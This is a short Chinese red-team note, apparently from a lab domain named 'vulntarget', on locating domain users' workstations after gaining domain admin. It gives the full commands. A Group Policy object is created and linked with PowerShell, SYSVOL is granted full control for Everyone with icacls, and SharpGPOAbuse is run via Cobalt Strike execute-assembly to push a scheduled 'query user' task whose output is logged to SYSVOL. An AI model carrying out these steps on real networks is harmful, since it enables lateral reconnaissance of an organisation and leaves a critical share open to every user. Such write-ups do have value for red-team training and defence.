域内定位成员pc机的办法
来自星球讨论群组的问题"有什么域内定位成员pc机的好办法吗",其中有师傅提
出：
gpo下发 query user 写log到sysvol就好了
一开始没理解，sysvol为啥普通域用户也可以写入，直到师傅的一句 都是域管了，修
改一下文件夹权限，才让我恍然大悟...
创建组策略：
powershell Import-Module GroupPolicy;new-gpo -name
QueryDomainUser01
连接到域：
powershell Import-Module GroupPolicy;new-gplink -name
QueryDomainUser01 -Target "dc=vulntarget,dc=com"
之后修改一下sysvol的权限：
shell icacls c:\windows\sysvol\ /grant Everyone:(OI)(CI)(F) /T
下发：
execute-assembly /root/cs/sharp/SharpGPOAbuse.exe -AddComputerTask --TaskName "QueryDomainUser001" --Author
vulntarget\\administrator --Command "cmd.exe" --Arguments "cmd /c
query user > \\win2019.vulntarget.com\sysvol\%COMPUTERNAME%.txt"
--GPOName "QueryDomainUser01"
之后等待90分钟(我懒得等了，直接强制执行了)
gpupdate /force
最终结果
WIN2016 和 WIN2019RY 是我手动输入的 gpupdate /force ，中间回消息了来
着。
当然，路径可以在优化一下，我就懒得再整了